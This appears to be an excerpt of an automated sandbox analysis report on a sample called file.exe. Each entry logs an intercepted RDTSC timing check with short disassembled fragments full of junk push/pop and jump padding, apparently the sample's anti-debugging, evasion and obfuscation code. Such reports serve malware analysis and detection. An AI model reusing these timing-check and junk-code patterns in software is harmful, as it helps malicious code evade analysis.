Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC5B1B second address: CC5B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC5B1F second address: CC5B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F99607DC0C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC5B2B second address: CC5B31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C43C05 second address: C43C17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F99607DC0CCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9735 second address: CC9739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9739 second address: CC9768 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99607DC0C6h 0x00000008 jmp 00007F99607DC0CAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007F99607DC0E0h 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 jmp 00007F99607DC0CAh 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCDD4A second address: CCDD54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F996107E1B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCDD54 second address: CCDD58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCD5A6 second address: CCD5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F996107E1B6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCD5B3 second address: CCD5C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0CDh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCD710 second address: CCD741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b pushad 0x0000000c jp 00007F996107E1B6h 0x00000012 jmp 00007F996107E1C3h 0x00000017 push edi 0x00000018 pop edi 0x00000019 jbe 00007F996107E1B6h 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCD741 second address: CCD747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCD9FA second address: CCDA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCDA00 second address: CCDA06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCDA06 second address: CCDA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F996107E1B6h 0x0000000a popad 0x0000000b jmp 00007F996107E1BEh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007F996107E1BCh 0x00000019 jnp 00007F996107E1B6h 0x0000001f jmp 00007F996107E1BCh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCDA3A second address: CCDA56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99607DC0D8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCDA56 second address: CCDA5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD3E44 second address: CD3E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD3E48 second address: CD3E5E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F996107E1B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F996107E1BAh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3E5E second address: CD3E65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3E65 second address: CD3E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F996107E1B6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3E79 second address: CD3E86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2A9E second address: CD2AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2AA2 second address: CD2AAC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99607DC0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2BD2 second address: CD2BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2BD8 second address: CD2BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jns 00007F99607DC0C8h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2BE5 second address: CD2BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F996107E1B6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2BF1 second address: CD2C23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F99607DC0CAh 0x0000000c jns 00007F99607DC0C6h 0x00000012 pop edx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jo 00007F99607DC0C6h 0x0000001e jmp 00007F99607DC0CFh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2C23 second address: CD2C33 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F996107E1B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2C33 second address: CD2C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2C39 second address: CD2C3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B249 second address: C7B24E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B24E second address: C7B25F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007F996107E1BEh 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B25F second address: C7B2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 nop 0x00000006 or dword ptr [ebp+1247BA0Fh], edi 0x0000000c jg 00007F99607DC0CBh 0x00000012 push 00000004h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F99607DC0C8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e je 00007F99607DC0CAh 0x00000034 mov dx, 2E6Eh 0x00000038 nop 0x00000039 push ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F99607DC0D9h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B2BD second address: C7B2E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F996107E1B6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3070 second address: CD307F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jc 00007F99607DC0CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD307F second address: CD3083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3083 second address: CD3093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0CBh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8181 second address: CD81AA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F996107E1C9h 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F996107E1B6h 0x00000010 js 00007F996107E1B6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD734F second address: CD7387 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F99607DC0C8h 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f jmp 00007F99607DC0D5h 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007F99607DC0CEh 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7387 second address: CD7399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F996107E1BCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7539 second address: CD753F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7B60 second address: CD7B8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F996107E1B8h 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 jno 00007F996107E1B6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF7FA second address: CDF820 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F99607DC0D9h 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF820 second address: CDF829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF829 second address: CDF833 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F99607DC0CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFC84 second address: CDFC89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFC89 second address: CDFCA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F99607DC0C6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c jng 00007F99607DC0C6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F99607DC0C6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFCA6 second address: CDFCAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE02DD second address: CE02EA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99607DC0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE056E second address: CE0572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0572 second address: CE057C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE057C second address: CE0586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F996107E1B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0586 second address: CE0590 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F99607DC0C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0872 second address: CE087E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0B06 second address: CE0B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0B0A second address: CE0B32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1C8h 0x00000007 jbe 00007F996107E1B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE10E5 second address: CE10E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE10E9 second address: CE10F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE10F2 second address: CE1126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F99607DC0C6h 0x0000000a pop edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 jns 00007F99607DC0C6h 0x00000018 jmp 00007F99607DC0CFh 0x0000001d pop eax 0x0000001e popad 0x0000001f pushad 0x00000020 push esi 0x00000021 push edi 0x00000022 pop edi 0x00000023 pushad 0x00000024 popad 0x00000025 pop esi 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1126 second address: CE112A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE112A second address: CE1149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F99607DC0D7h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1149 second address: CE114D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE144B second address: CE144F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE144F second address: CE1460 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1460 second address: CE146A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99607DC0D2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB05E second address: CEB062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB062 second address: CEB07D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F99607DC0CFh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB07D second address: CEB083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB083 second address: CEB087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB1E8 second address: CEB20E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F996107E1B6h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F996107E1C0h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007F996107E1B6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB20E second address: CEB212 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB212 second address: CEB22A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F996107E1B8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB22A second address: CEB230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB230 second address: CEB23C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F996107E1B6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB3BF second address: CEB3D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0CDh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB566 second address: CEB573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jo 00007F996107E1B6h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB573 second address: CEB579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2E38 second address: CF2E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2E44 second address: CF2E4E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F99607DC0C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2E4E second address: CF2E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3158 second address: CF3161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3708 second address: CF370E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF370E second address: CF3712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3712 second address: CF3716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3716 second address: CF371F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF39F2 second address: CF3A0A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F996107E1C2h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3A0A second address: CF3A17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnc 00007F99607DC0C6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C34918 second address: C3494B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jg 00007F996107E1B6h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F996107E1C8h 0x00000014 popad 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jnl 00007F996107E1B8h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3B90 second address: CF3B94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF42CA second address: CF42D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7D22 second address: CF7D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop esi 0x0000000b jmp 00007F99607DC0D1h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7D42 second address: CF7D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7D46 second address: CF7D6E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jbe 00007F99607DC0C6h 0x00000010 jmp 00007F99607DC0D7h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7D6E second address: CF7D96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1BBh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F996107E1C7h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7D96 second address: CF7DA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0CCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
